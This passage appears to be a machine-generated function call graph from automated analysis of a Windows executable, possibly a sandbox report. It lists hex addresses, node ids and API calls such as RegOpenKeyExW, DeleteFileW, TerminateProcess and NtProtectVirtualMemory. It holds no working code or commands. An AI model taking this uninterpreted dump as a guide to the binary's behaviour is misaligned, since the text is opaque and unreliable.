dc7e30 97589->97590 97590->97234 97590->97235 97592 dcc76b 97591->97592 97593 e11285 97592->97593 97598 dcc773 ISource 97592->97598 97594 de014b 8 API calls 97593->97594 97596 e11291 97594->97596 97595 dcc77a 97595->97566 97598->97595 97599 dcc7e0 8 API calls ISource 97598->97599 97599->97598 97600->97576 97601->97579 97603 e318b6 97602->97603 97604 de014b 8 API calls 97603->97604 97605 e318bd 97604->97605 97608 e2fcb5 97605->97608 97607 e318f7 97607->97291 97609 dcc2c9 8 API calls 97608->97609 97610 e2fcc8 CharLowerBuffW 97609->97610 97611 e2fcdb 97610->97611 97612 e2fce5 ___scrt_fastfail 97611->97612 97613 e2fd19 97611->97613 97614 dc655e 8 API calls 97611->97614 97612->97607 97615 dc655e 8 API calls 97613->97615 97617 e2fd2b 97613->97617 97614->97611 97615->97617 97616 de017b 8 API calls 97621 e2fd59 97616->97621 97617->97616 97620 e2fdb8 97620->97612 97623 de014b 8 API calls 97620->97623 97622 e2fd7b 97621->97622 97641 e2fbed 8 API calls 97621->97641 97626 e2fe0c 97622->97626 97624 e2fdd2 97623->97624 97625 de017b 8 API calls 97624->97625 97625->97612 97627 dcbf73 8 API calls 97626->97627 97628 e2fe3e 97627->97628 97629 dcbf73 8 API calls 97628->97629 97630 e2fe47 97629->97630 97631 dcbf73 8 API calls 97630->97631 97638 e2fe50 97631->97638 97632 dc8577 8 API calls 97632->97638 97633 dcad40 8 API calls 97633->97638 97634 de66f8 GetStringTypeW 97634->97638 97636 de6641 39 API calls 97636->97638 97637 e2fe0c 40 API calls 97637->97638 97638->97632 97638->97633 97638->97634 97638->97636 97638->97637 97639 e30114 97638->97639 97640 dcbed9 8 API calls 97638->97640 97642 de6722 GetStringTypeW _strftime 97638->97642 97639->97620 97640->97638 97641->97621 97642->97638 97677 e302aa 97643->97677 97646 e303f3 97693 e305e9 56 API calls __fread_nolock 97646->97693 97648 e30471 97650 e304a1 97648->97650 97651 e30507 97648->97651 97668 e30399 __fread_nolock 97648->97668 97649 e3040b 97649->97648 97652 e3041b 97649->97652 97653 e304d1 97650->97653 97654 e304a6 97650->97654 97655 e305b0 97651->97655 97656 e30510 97651->97656 97657 e30453 97652->97657 97694 e32855 10 API calls 97652->97694 97653->97668 97698 dcca5b 39 API calls 97653->97698 97654->97668 97697 dcca5b 39 API calls 97654->97697 97655->97668 97702 dcc63f 39 API calls 97655->97702 97658 e30515 97656->97658 97659 e3058d 97656->97659 97684 e31844 97657->97684 97664 e30554 97658->97664 97665 e3051b 97658->97665 97659->97668 97701 dcc63f 39 API calls 97659->97701 97664->97668 97700 dcc63f 39 API calls 97664->97700 97665->97668 97699 dcc63f 39 API calls 97665->97699 97668->97293 97670 e30427 97695 e32855 10 API calls 97670->97695 97673 e3043e __fread_nolock 97696 e32855 10 API calls 97673->97696 97675->97294 97676->97298 97678 e302f7 97677->97678 97682 e302bb 97677->97682 97713 dcc98d 39 API calls 97678->97713 97679 e302f5 97679->97646 97679->97649 97679->97668 97681 dc8ec0 52 API calls 97681->97682 97682->97679 97682->97681 97703 de4d98 97682->97703 97685 e3184f 97684->97685 97686 de014b 8 API calls 97685->97686 97687 e31856 97686->97687 97688 e31883 97687->97688 97689 e31862 97687->97689 97691 de017b 8 API calls 97688->97691 97690 de017b 8 API calls 97689->97690 97692 e3186b ___scrt_fastfail 97690->97692 97691->97692 97692->97668 97693->97668 97694->97670 97695->97673 97696->97657 97697->97668 97698->97668 97699->97668 97700->97668 97701->97668 97702->97668 97704 de4e1b 97703->97704 97705 de4da6 97703->97705 97716 de4e2d 40 API calls 4 library calls 97704->97716 97711 de4dcb 97705->97711 97714 def649 20 API calls _abort 97705->97714 97708 de4e28 97708->97682 97709 de4db2 97715 df2b5c 26 API calls _abort 97709->97715 97711->97682 97712 de4dbd 97712->97682 97713->97679 97714->97709 97715->97712 97716->97708 97718 dc8ec0 52 API calls 97717->97718 97719 e489ed 97718->97719 97742 e48a32 ISource 97719->97742 97755 e49730 97719->97755 97721 e48cde 97722 e48eac 97721->97722 97727 e48cec 97721->97727 97794 e49941 59 API calls 97722->97794 97725 e48ebb 97726 e48ec7 97725->97726 97725->97727 97726->97742 97768 e488e3 97727->97768 97728 dc8ec0 52 API calls 97743 e48aa6 97728->97743 97733 e48d25 97782 ddffe0 97733->97782 97736 e48d45 97789 e33fe1 81 API calls __wsopen_s 97736->97789 97737 e48d5f 97739 dc7e12 8 API calls 97737->97739 97741 e48d6e 97739->97741 97740 e48d50 GetCurrentProcess TerminateProcess 97740->97737 97744 dc8470 8 API calls 97741->97744 97742->97302 97743->97721 97743->97728 97743->97742 97787 e24ad3 8 API calls __fread_nolock 97743->97787 97788 e48f7a 41 API calls _strftime 97743->97788 97745 e48d87 97744->97745 97754 e48daf 97745->97754 97790 dd1ca0 8 API calls 97745->97790 97747 e48f22 97747->97742 97750 e48f36 FreeLibrary 97747->97750 97748 e48d9e 97791 e495d8 74 API calls 97748->97791 97750->97742 97754->97747 97792 dd1ca0 8 API calls 97754->97792 97793 dcb4c8 8 API calls 97754->97793 97795 e495d8 74 API calls 97754->97795 97756 dcc2c9 8 API calls 97755->97756 97757 e4974b CharLowerBuffW 97756->97757 97796 e29805 97757->97796 97761 dcbf73 8 API calls 97762 e49787 97761->97762 97763 dcacc0 8 API calls 97762->97763 97764 e4979b 97763->97764 97765 dcadf4 8 API calls 97764->97765 97767 e497a5 _wcslen 97765->97767 97766 e498bb _wcslen 97766->97743 97767->97766 97803 e48f7a 41 API calls _strftime 97767->97803 97769 e488fe 97768->97769 97770 e48949 97768->97770 97771 de017b 8 API calls 97769->97771 97774 e49af3 97770->97774 97772 e48920 97771->97772 97772->97770 97773 de014b 8 API calls 97772->97773 97773->97772 97775 e49d08 ISource 97774->97775 97781 e49b17 _strcat _wcslen ___std_exception_copy 97774->97781 97775->97733 97776 dcc98d 39 API calls 97776->97781 97777 dcc63f 39 API calls 97777->97781 97778 dcca5b 39 API calls 97778->97781 97779 dc8ec0 52 API calls 97779->97781 97781->97775 97781->97776 97781->97777 97781->97778 97781->97779 97806 e2f8c5 10 API calls _wcslen 97781->97806 97784 ddfff5 97782->97784 97783 de008d NtProtectVirtualMemory 97786 de005b 97783->97786 97784->97783 97785 de007b CloseHandle 97784->97785 97784->97786 97785->97786 97786->97736 97786->97737 97787->97743 97788->97743 97789->97740 97790->97748 97791->97754 97792->97754 97793->97754 97794->97725 97795->97754 97797 e29825 _wcslen 97796->97797 97798 e29914 97797->97798 97800 e29919 97797->97800 97802 e2985a 97797->97802 97798->97761 97798->97767 97800->97798 97805 dde36b 41 API calls 97800->97805 97802->97798 97804 dde36b 41 API calls 97802->97804 97803->97766 97804->97802 97805->97800 97806->97781 97808 de017b 8 API calls 97807->97808 97809 ddc209 97808->97809 97810 de014b 8 API calls 97809->97810 97811 ddc215 97810->97811 97811->97312 97813 ddf9fe 97812->97813 97814 ddfa35 97812->97814 97816 de017b 8 API calls 97813->97816 97826 ddfe8a 8 API calls 97814->97826 97817 ddfa05 WideCharToMultiByte 97816->97817 97825 ddfa3e 8 API calls __fread_nolock 97817->97825 97819 ddfa29 97819->97316 97820->97309 97821->97313 97823 de014b 8 API calls 97822->97823 97824 dc424e 97823->97824 97824->97323 97824->97324 97825->97819 97826->97819 97827->97336 97828->97338 97829->97343 97831 dcbf73 8 API calls 97830->97831 97832 e2dc73 97831->97832 97833 dcbf73 8 API calls 97832->97833 97834 e2dc7c 97833->97834 97835 dcbf73 8 API calls 97834->97835 97836 e2dc85 97835->97836 97854 dc5851 97836->97854 97841 e2dcab 97843 dc568e 8 API calls 97841->97843 97842 dc6b7c 8 API calls 97842->97841 97844 e2dcbf FindFirstFileW 97843->97844 97845 e2dd4b FindClose 97844->97845 97850 e2dcde 97844->97850 97846 e2dd56 97845->97846 97846->97352 97847 e2dd26 FindNextFileW 97847->97850 97848 dcbed9 8 API calls 97848->97850 97849 dc7bb5 8 API calls 97849->97850 97850->97845 97850->97847 97850->97848 97850->97849 97866 dc6b7c 97850->97866 97853 e2dd42 FindClose 97853->97846 97875 e022d0 97854->97875 97857 dc587d 97860 dc8577 8 API calls 97857->97860 97858 dc5898 97859 dcbd57 8 API calls 97858->97859 97861 dc5889 97859->97861 97860->97861 97877 dc55dc 97861->97877 97864 e2eab0 GetFileAttributesW 97865 e2dc99 97864->97865 97865->97841 97865->97842 97867 e057fe 97866->97867 97868 dc6b93 97866->97868 97870 de014b 8 API calls 97867->97870 97881 dc6ba4 97868->97881 97872 e05808 _wcslen 97870->97872 97871 dc6b9e DeleteFileW 97871->97847 97871->97853 97873 de017b 8 API calls 97872->97873 97874 e05841 __fread_nolock 97873->97874 97876 dc585e GetFullPathNameW 97875->97876 97876->97857 97876->97858 97878 dc55ea 97877->97878 97879 dcadf4 8 API calls 97878->97879 97880 dc55fe 97879->97880 97880->97864 97882 dc6bb4 _wcslen 97881->97882 97883 e05860 97882->97883 97884 dc6bc7 97882->97884 97886 de014b 8 API calls 97883->97886 97885 dc7d74 8 API calls 97884->97885 97888 dc6bd4 __fread_nolock 97885->97888 97887 e0586a 97886->97887 97889 de017b 8 API calls 97887->97889 97888->97871 97890 e0589a __fread_nolock 97889->97890 97892 dc3996 ___scrt_fastfail 97891->97892 97908 dc5f32 97892->97908 97896 dc3a3a Shell_NotifyIconW 97912 dc61a9 97896->97912 97897 e040cd Shell_NotifyIconW 97898 dc3a1c 97898->97896 97898->97897 97900 dc3a50 97900->97369 97902 dc3969 97901->97902 97903 dc3919 ___scrt_fastfail 97901->97903 97902->97369 97904 dc3938 Shell_NotifyIconW 97903->97904 97904->97902 97905->97369 97906->97369 97907->97369 97909 dc5f4e 97908->97909 97910 dc39eb 97908->97910 97909->97910 97911 e05070 DestroyIcon 97909->97911 97910->97898 97942 e2d11f 42 API calls _strftime 97910->97942 97911->97910 97913 dc61c6 97912->97913 97932 dc62a8 97912->97932 97914 dc7ad5 8 API calls 97913->97914 97915 dc61d4 97914->97915 97916 e05278 LoadStringW 97915->97916 97917 dc61e1 97915->97917 97920 e05292 97916->97920 97918 dc8577 8 API calls 97917->97918 97919 dc61f6 97918->97919 97921 dc6203 97919->97921 97928 e052ae 97919->97928 97923 dcbed9 8 API calls 97920->97923 97924 dc6229 ___scrt_fastfail 97920->97924 97921->97920 97922 dc620d 97921->97922 97925 dc6b7c 8 API calls 97922->97925 97923->97924 97930 dc628e Shell_NotifyIconW 97924->97930 97926 dc621b 97925->97926 97927 dc7bb5 8 API calls 97926->97927 97927->97924 97928->97924 97929 e052f1 97928->97929 97931 dcbf73 8 API calls 97928->97931 97944 ddfe6f 51 API calls 97929->97944 97930->97932 97933 e052d8 97931->97933 97932->97900 97943 e2a350 9 API calls 97933->97943 97936 e05310 97938 dc6b7c 8 API calls 97936->97938 97937 e052e3 97939 dc7bb5 8 API calls 97937->97939 97940 e05321 97938->97940 97939->97929 97941 dc6b7c 8 API calls 97940->97941 97941->97924 97942->97898 97943->97937 97944->97936 97946 e4614f 97945->97946 97947 e46101 97945->97947 97946->97380 97948 de017b 8 API calls 97947->97948 97950 e46123 97948->97950 97949 de014b 8 API calls 97949->97950 97950->97946 97950->97949 97961 e31400 8 API calls 97950->97961 97953 e31499 97952->97953 97955 e314d2 97952->97955 97954 de014b 8 API calls 97953->97954 97953->97955 97954->97955 97955->97404 97956->97405 97957->97389 97958->97405 97959->97406 97960->97405 97961->97950 97962 e11ac5 97963 e11acd 97962->97963 97966 dcd535 97962->97966 97993 e27a87 8 API calls __fread_nolock 97963->97993 97965 e11adf 97994 e27a00 8 API calls __fread_nolock 97965->97994 97968 de014b 8 API calls 97966->97968 97970 dcd589 97968->97970 97969 e11b09 97971 dd0340 207 API calls 97969->97971 97973 dcc32d 8 API calls 97970->97973 97972 e11b30 97971->97972 97974 e11b44 97972->97974 97995 e461a2 53 API calls _wcslen 97972->97995 97976 dcd5b3 97973->97976 97977 de014b 8 API calls 97976->97977 97984 dcd66e ISource 97977->97984 97978 e11b61 97978->97966 97996 e27a87 8 API calls __fread_nolock 97978->97996 97980 dcc3ab 8 API calls 97990 dcd9ac ISource 97980->97990 97983 e11f79 97998 e256ae 8 API calls ISource 97983->97998 97984->97983 97986 e11f94 97984->97986 97987 dcbed9 8 API calls 97984->97987 97988 dcc3ab 8 API calls 97984->97988 97989 dcd911 ISource 97984->97989 97997 dcb4c8 8 API calls 97984->97997 97987->97984 97988->97984 97989->97980 97989->97990 97991 dcd9c3 97990->97991 97992 dde30a 8 API calls ISource 97990->97992 97992->97990 97993->97965 97994->97969 97995->97978 97996->97978 97997->97984 97998->97986 97999 dc1098 98004 dc5fc8 97999->98004 98003 dc10a7 98005 dcbf73 8 API calls 98004->98005 98006 dc5fdf GetVersionExW 98005->98006 98007 dc8577 8 API calls 98006->98007 98008 dc602c 98007->98008 98009 dcadf4 8 API calls 98008->98009 98013 dc6062 98008->98013 98010 dc6056 98009->98010 98012 dc55dc 8 API calls 98010->98012 98011 dc611c GetCurrentProcess IsWow64Process 98014 dc6138 98011->98014 98012->98013 98013->98011 98021 e05224 98013->98021 98015 e05269 GetSystemInfo 98014->98015 98016 dc6150 LoadLibraryA 98014->98016 98017 dc619d GetSystemInfo 98016->98017 98018 dc6161 GetProcAddress 98016->98018 98020 dc6177 98017->98020 98018->98017 98019 dc6171 GetNativeSystemInfo 98018->98019 98019->98020 98022 dc617b FreeLibrary 98020->98022 98023 dc109d 98020->98023 98022->98023 98024 de0413 29 API calls __onexit 98023->98024 98024->98003 98025 df947a 98026 df9487 98025->98026 98029 df949f 98025->98029 98082 def649 20 API calls _abort 98026->98082 98028 df948c 98083 df2b5c 26 API calls _abort 98028->98083 98031 df94fa 98029->98031 98039 df9497 98029->98039 98084 e00144 21 API calls 2 library calls 98029->98084 98045 dedcc5 98031->98045 98034 df9512 98052 df8fb2 98034->98052 98036 df9519 98037 dedcc5 __fread_nolock 26 API calls 98036->98037 98036->98039 98038 df9545 98037->98038 98038->98039 98040 dedcc5 __fread_nolock 26 API calls 98038->98040 98041 df9553 98040->98041 98041->98039 98042 dedcc5 __fread_nolock 26 API calls 98041->98042 98043 df9563 98042->98043 98044 dedcc5 __fread_nolock 26 API calls 98043->98044 98044->98039 98046 dedce6 98045->98046 98047 dedcd1 98045->98047 98046->98034 98085 def649 20 API calls _abort 98047->98085 98049 dedcd6 98086 df2b5c 26 API calls _abort 98049->98086 98051 dedce1 98051->98034 98053 df8fbe BuildCatchObjectHelperInternal 98052->98053 98054 df8fde 98053->98054 98055 df8fc6 98053->98055 98056 df90a4 98054->98056 98060 df9017 98054->98060 98153 def636 20 API calls _abort 98055->98153 98160 def636 20 API calls _abort 98056->98160 98059 df8fcb 98154 def649 20 API calls _abort 98059->98154 98063 df903b 98060->98063 98064 df9026 98060->98064 98061 df90a9 98161 def649 20 API calls _abort 98061->98161 98087 df54ba EnterCriticalSection 98063->98087 98155 def636 20 API calls _abort 98064->98155 98066 df8fd3 __fread_nolock 98066->98036 98069 df9033 98162 df2b5c 26 API calls _abort 98069->98162 98070 df902b 98156 def649 20 API calls _abort 98070->98156 98071 df9041 98073 df905d 98071->98073 98074 df9072 98071->98074 98157 def649 20 API calls _abort 98073->98157 98088 df90c5 98074->98088 98078 df906d 98159 df909c LeaveCriticalSection __wsopen_s 98078->98159 98079 df9062 98158 def636 20 API calls _abort 98079->98158 98082->98028 98083->98039 98084->98031 98085->98049 98086->98051 98087->98071 98089 df90ef 98088->98089 98090 df90d7 98088->98090 98091 df9459 98089->98091 98095 df9134 98089->98095 98179 def636 20 API calls _abort 98090->98179 98202 def636 20 API calls _abort 98091->98202 98093 df90dc 98180 def649 20 API calls _abort 98093->98180 98099 df913f 98095->98099 98102 df90e4 98095->98102 98106 df916f 98095->98106 98097 df945e 98203 def649 20 API calls _abort 98097->98203 98181 def636 20 API calls _abort 98099->98181 98100 df914c 98204 df2b5c 26 API calls _abort 98100->98204 98102->98078 98103 df9144 98182 def649 20 API calls _abort 98103->98182 98107 df9188 98106->98107 98108 df91ae 98106->98108 98109 df91ca 98106->98109 98107->98108 98115 df9195 98107->98115 98183 def636 20 API calls _abort 98108->98183 98163 df3b93 98109->98163 98111 df91b3 98184 def649 20 API calls _abort 98111->98184 98170 dffc1b 98115->98170 98117 df91ba 98185 df2b5c 26 API calls _abort 98117->98185 98118 df9333 98121 df93a9 98118->98121 98124 df934c GetConsoleMode 98118->98124 98123 df93ad ReadFile 98121->98123 98122 df91ea 98125 df2d38 _free 20 API calls 98122->98125 98127 df93c7 98123->98127 98128 df9421 GetLastError 98123->98128 98124->98121 98129 df935d 98124->98129 98126 df91f1 98125->98126 98130 df91fb 98126->98130 98131 df9216 98126->98131 98127->98128 98134 df939e 98127->98134 98132 df942e 98128->98132 98133 df9385 98128->98133 98129->98123 98135 df9363 ReadConsoleW 98129->98135 98192 def649 20 API calls _abort 98130->98192 98194 df97a4 98131->98194 98200 def649 20 API calls _abort 98132->98200 98151 df91c5 __fread_nolock 98133->98151 98197 def613 20 API calls __dosmaperr 98133->98197 98146 df93ec 98134->98146 98147 df9403 98134->98147 98134->98151 98135->98134 98140 df937f GetLastError 98135->98140 98136 df2d38 _free 20 API calls 98136->98102 98140->98133 98141 df9200 98193 def636 20 API calls _abort 98141->98193 98142 df9433 98201 def636 20 API calls _abort 98142->98201 98198 df8de1 31 API calls 2 library calls 98146->98198 98149 df941a 98147->98149 98147->98151 98199 df8c21 29 API calls __fread_nolock 98149->98199 98151->98136 98152 df941f 98152->98151 98153->98059 98154->98066 98155->98070 98156->98069 98157->98079 98158->98078 98159->98066 98160->98061 98161->98069 98162->98066 98164 df3bd1 98163->98164 98168 df3ba1 _abort 98163->98168 98206 def649 20 API calls _abort 98164->98206 98165 df3bbc RtlAllocateHeap 98167 df3bcf 98165->98167 98165->98168 98186 df2d38 98167->98186 98168->98164 98168->98165 98205 de521d 7 API calls 2 library calls 98168->98205 98171 dffc28 98170->98171 98172 dffc35 98170->98172 98207 def649 20 API calls _abort 98171->98207 98174 dffc41 98172->98174 98208 def649 20 API calls _abort 98172->98208 98174->98118 98176 dffc2d 98176->98118 98177 dffc62 98209 df2b5c 26 API calls _abort 98177->98209 98179->98093 98180->98102 98181->98103 98182->98100 98183->98111 98184->98117 98185->98151 98187 df2d43 RtlFreeHeap 98186->98187 98188 df2d6c __dosmaperr 98186->98188 98187->98188 98189 df2d58 98187->98189 98188->98122 98210 def649 20 API calls _abort 98189->98210 98191 df2d5e GetLastError 98191->98188 98192->98141 98193->98151 98211 df970b 98194->98211 98197->98151 98198->98151 98199->98152 98200->98142 98201->98151 98202->98097 98203->98100 98204->98102 98205->98168 98206->98167 98207->98176 98208->98177 98209->98176 98210->98191 98220 df5737 98211->98220 98213 df971d 98214 df9736 SetFilePointerEx 98213->98214 98215 df9725 98213->98215 98217 df974e GetLastError 98214->98217 98218 df972a 98214->98218 98233 def649 20 API calls _abort 98215->98233 98234 def613 20 API calls __dosmaperr 98217->98234 98218->98115 98221 df5759 98220->98221 98222 df5744 98220->98222 98227 df577e 98221->98227 98237 def636 20 API calls _abort 98221->98237 98235 def636 20 API calls _abort 98222->98235 98224 df5749 98236 def649 20 API calls _abort 98224->98236 98227->98213 98228 df5789 98238 def649 20 API calls _abort 98228->98238 98230 df5751 98230->98213 98231 df5791 98239 df2b5c 26 API calls _abort 98231->98239 98233->98218 98234->98218 98235->98224 98236->98230 98237->98228 98238->98231 98239->98230 98240 dc105b 98245 dc52a7 98240->98245 98242 dc106a 98276 de0413 29 API calls __onexit 98242->98276 98244 dc1074 98246 dc52b7 __wsopen_s 98245->98246 98247 dcbf73 8 API calls 98246->98247 98248 dc536d 98247->98248 98277 dc5594 98248->98277 98250 dc5376 98284 dc5238 98250->98284 98253 dc6b7c 8 API calls 98254 dc538f 98253->98254 98290 dc6a7c 98254->98290 98257 dcbf73 8 API calls 98258 dc53a7 98257->98258 98259 dcbd57 8 API calls 98258->98259 98260 dc53b0 RegOpenKeyExW 98259->98260 98261 e04be6 RegQueryValueExW 98260->98261 98265 dc53d2 98260->98265 98262 e04c03 98261->98262 98263 e04c7c RegCloseKey 98261->98263 98264 de017b 8 API calls 98262->98264 98263->98265 98275 e04c8e _wcslen 98263->98275 98266 e04c1c 98264->98266 98265->98242 98267 dc423c 8 API calls 98266->98267 98268 e04c27 RegQueryValueExW 98267->98268 98269 e04c44 98268->98269 98272 e04c5e ISource 98268->98272 98270 dc8577 8 API calls 98269->98270 98270->98272 98271 dc655e 8 API calls 98271->98275 98272->98263 98273 dcb329 8 API calls 98273->98275 98274 dc6a7c 8 API calls 98274->98275 98275->98265 98275->98271 98275->98273 98275->98274 98276->98244 98278 e022d0 __wsopen_s 98277->98278 98279 dc55a1 GetModuleFileNameW 98278->98279 98280 dcb329 8 API calls 98279->98280 98281 dc55c7 98280->98281 98282 dc5851 9 API calls 98281->98282 98283 dc55d1 98282->98283 98283->98250 98285 e022d0 __wsopen_s 98284->98285 98286 dc5245 GetFullPathNameW 98285->98286 98287 dc5267 98286->98287 98288 dc8577 8 API calls 98287->98288 98289 dc5285 98288->98289 98289->98253 98291 dc6a8b 98290->98291 98295 dc6aac __fread_nolock 98290->98295 98293 de017b 8 API calls 98291->98293 98292 de014b 8 API calls 98294 dc539e 98292->98294 98293->98295 98294->98257 98295->98292 98296 dc36f5 98299 dc370f 98296->98299 98300 dc3726 98299->98300 98301 dc378a 98300->98301 98302 dc372b 98300->98302 98340 dc3788 98300->98340 98304 e03df4 98301->98304 98305 dc3790 98301->98305 98306 dc3738 98302->98306 98307 dc3804 PostQuitMessage 98302->98307 98303 dc376f DefWindowProcW 98330 dc3709 98303->98330 98354 dc2f92 10 API calls 98304->98354 98308 dc37bc SetTimer RegisterWindowMessageW 98305->98308 98309 dc3797 98305->98309 98310 e03e61 98306->98310 98311 dc3743 98306->98311 98307->98330 98316 dc37e5 CreatePopupMenu 98308->98316 98308->98330 98314 e03d95 98309->98314 98315 dc37a0 KillTimer 98309->98315 98357 e2c8f7 65 API calls ___scrt_fastfail 98310->98357 98317 dc374d 98311->98317 98318 dc380e 98311->98318 98313 e03e15 98355 ddf23c 40 API calls 98313->98355 98323 e03dd0 MoveWindow 98314->98323 98324 e03d9a 98314->98324 98325 dc3907 Shell_NotifyIconW 98315->98325 98316->98330 98326 dc3758 98317->98326 98327 e03e46 98317->98327 98344 ddfcad 98318->98344 98320 e03e73 98320->98303 98320->98330 98323->98330 98331 e03da0 98324->98331 98332 e03dbf SetFocus 98324->98332 98333 dc37b3 98325->98333 98328 dc37f2 98326->98328 98329 dc3763 98326->98329 98327->98303 98356 e21423 8 API calls 98327->98356 98352 dc381f 75 API calls ___scrt_fastfail 98328->98352 98329->98303 98341 dc3907 Shell_NotifyIconW 98329->98341 98331->98329 98335 e03da9 98331->98335 98332->98330 98351 dc59ff DeleteObject DestroyWindow 98333->98351 98353 dc2f92 10 API calls 98335->98353 98338 dc3802 98338->98330 98340->98303 98342 e03e3a 98341->98342 98343 dc396b 60 API calls 98342->98343 98343->98340 98345 ddfd4b 98344->98345 98346 ddfcc5 ___scrt_fastfail 98344->98346 98345->98330 98347 dc61a9 55 API calls 98346->98347 98349 ddfcec 98347->98349 98348 ddfd34 KillTimer SetTimer 98348->98345 98349->98348 98350 e1fe2b Shell_NotifyIconW 98349->98350 98350->98348 98351->98330 98352->98338 98353->98330 98354->98313 98355->98329 98356->98340 98357->98320 98358 e13c0a 98379 e2c819 98358->98379 98360 e13c14 98362 e2c819 Sleep 98360->98362 98363 e13c3f 98360->98363 98369 dcefdb 98360->98369 98385 ddaa65 9 API calls 98360->98385 98362->98360 98364 dcb329 8 API calls 98363->98364 98365 e13c6f 98364->98365 98386 dcbfa5 39 API calls 98365->98386 98367 e13c8b 98387 e3446f 8 API calls 98367->98387 98372 dcf450 98369->98372 98371 dcf097 98373 dcf46f 98372->98373 98375 dcf483 98372->98375 98388 dce960 98373->98388 98420 e33fe1 81 API calls __wsopen_s 98375->98420 98376 dcf47a 98376->98371 98378 e14584 98378->98378 98380 e2c824 98379->98380 98381 e2c83f 98379->98381 98380->98360 98382 e2c86d 98381->98382 98383 e2c85b Sleep 98381->98383 98382->98360 98383->98382 98385->98360 98386->98367 98387->98371 98389 dd0340 207 API calls 98388->98389 98392 dce99d 98389->98392 98391 dcedd5 98394 dcea0b ISource 98391->98394 98403 de017b 8 API calls 98391->98403 98392->98391 98393 dceac3 98392->98393 98392->98394 98399 dcebb8 98392->98399 98405 e131d3 98392->98405 98409 de014b 8 API calls 98392->98409 98415 dceb29 ISource __fread_nolock 98392->98415 98393->98391 98396 dceace 98393->98396 98394->98376 98395 dcecff 98397 e131c4 98395->98397 98398 dced14 98395->98398 98400 de014b 8 API calls 98396->98400 98433 e46162 8 API calls 98397->98433 98402 de014b 8 API calls 98398->98402 98404 de017b 8 API calls 98399->98404 98408 dcead5 __fread_nolock 98400->98408 98412 dceb6a 98402->98412 98403->98408 98404->98415 98434 e33fe1 81 API calls __wsopen_s 98405->98434 98406 de014b 8 API calls 98407 dceaf6 98406->98407 98407->98415 98421 dcd260 98407->98421 98408->98406 98408->98407 98409->98392 98411 e131b3 98432 e33fe1 81 API calls __wsopen_s 98411->98432 98412->98376 98415->98395 98415->98411 98415->98412 98416 e1318e 98415->98416 98418 e1316c 98415->98418 98429 dc44fe 207 API calls 98415->98429 98431 e33fe1 81 API calls __wsopen_s 98416->98431 98430 e33fe1 81 API calls __wsopen_s 98418->98430 98420->98378 98422 dcd29a 98421->98422 98424 dcd2c6 98421->98424 98427 dcd2a0 98422->98427 98435 dcf6d0 98422->98435 98425 dd0340 207 API calls 98424->98425 98426 e1184b 98425->98426 98426->98427 98458 e33fe1 81 API calls __wsopen_s 98426->98458 98427->98415 98429->98415 98430->98412 98431->98412 98432->98412 98433->98405 98434->98394 98436 dcf710 98435->98436 98451 dcf7dc ISource 98436->98451 98460 de05b2 5 API calls __Init_thread_wait 98436->98460 98437 dd0340 207 API calls 98437->98451 98440 e145d9 98442 dcbf73 8 API calls 98440->98442 98440->98451 98441 dcbf73 8 API calls 98441->98451 98445 e145f3 98442->98445 98443 dcbe2d 39 API calls 98443->98451 98461 de0413 29 API calls __onexit 98445->98461 98447 e145fd 98462 de0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98447->98462 98451->98437 98451->98441 98451->98443 98452 dcbed9 8 API calls 98451->98452 98453 dd1ca0 8 API calls 98451->98453 98454 dcfae1 98451->98454 98455 e33fe1 81 API calls 98451->98455 98459 ddb35c 207 API calls 98451->98459 98463 de05b2 5 API calls __Init_thread_wait 98451->98463 98464 de0413 29 API calls __onexit 98451->98464 98465 de0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98451->98465 98466 e45231 101 API calls 98451->98466 98467 e4731e 207 API calls 98451->98467 98452->98451 98453->98451 98454->98427 98455->98451 98458->98427 98459->98451 98460->98440 98461->98447 98462->98451 98463->98451 98464->98451 98465->98451 98466->98451 98467->98451 98468 dc1033 98473 dc68b4 98468->98473 98472 dc1042 98474 dcbf73 8 API calls 98473->98474 98475 dc6922 98474->98475 98481 dc589f 98475->98481 98478 dc69bf 98479 dc1038 98478->98479 98484 dc6b14 8 API calls __fread_nolock 98478->98484 98480 de0413 29 API calls __onexit 98479->98480 98480->98472 98485 dc58cb 98481->98485 98484->98478 98486 dc58be 98485->98486 98487 dc58d8 98485->98487 98486->98478 98487->98486 98488 dc58df RegOpenKeyExW 98487->98488 98488->98486 98489 dc58f9 RegQueryValueExW 98488->98489 98490 dc592f RegCloseKey 98489->98490 98491 dc591a 98489->98491 98490->98486 98491->98490 98492 def06e 98493 def07a BuildCatchObjectHelperInternal 98492->98493 98494 def09b 98493->98494 98495 def086 98493->98495 98505 de94fd EnterCriticalSection 98494->98505 98511 def649 20 API calls _abort 98495->98511 98498 def0a7 98506 def0db 98498->98506 98499 def08b 98512 df2b5c 26 API calls _abort 98499->98512 98504 def096 __fread_nolock 98505->98498 98514 def106 98506->98514 98508 def0e8 98509 def0b4 98508->98509 98534 def649 20 API calls _abort 98508->98534 98513 def0d1 LeaveCriticalSection __fread_nolock 98509->98513 98511->98499 98512->98504 98513->98504 98515 def12e 98514->98515 98516 def114 98514->98516 98517 dedcc5 __fread_nolock 26 API calls 98515->98517 98538 def649 20 API calls _abort 98516->98538 98519 def137 98517->98519 98535 df9789 98519->98535 98520 def119 98539 df2b5c 26 API calls _abort 98520->98539 98523 def124 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 98523->98508 98525 def1bf 98529 def1dc 98525->98529 98531 def1ee 98525->98531 98526 def23b 98527 def248 98526->98527 98526->98531 98541 def649 20 API calls _abort 98527->98541 98540 def41f 31 API calls 4 library calls 98529->98540 98531->98523 98542 def29b 30 API calls 2 library calls 98531->98542 98532 def1e6 98532->98523 98534->98509 98543 df9606 98535->98543 98537 def153 98537->98523 98537->98525 98537->98526 98538->98520 98539->98523 98540->98532 98541->98523 98542->98523 98544 df9612 BuildCatchObjectHelperInternal 98543->98544 98545 df961a 98544->98545 98546 df9632 98544->98546 98569 def636 20 API calls _abort 98545->98569 98548 df96e6 98546->98548 98551 df966a 98546->98551 98574 def636 20 API calls _abort 98548->98574 98550 df961f 98570 def649 20 API calls _abort 98550->98570 98568 df54ba EnterCriticalSection 98551->98568 98552 df96eb 98575 def649 20 API calls _abort 98552->98575 98556 df9670 98558 df96a9 98556->98558 98559 df9694 98556->98559 98557 df96f3 98576 df2b5c 26 API calls _abort 98557->98576 98562 df970b __fread_nolock 28 API calls 98558->98562 98571 def649 20 API calls _abort 98559->98571 98565 df96a4 98562->98565 98563 df9699 98572 def636 20 API calls _abort 98563->98572 98564 df9627 __fread_nolock 98564->98537 98573 df96de 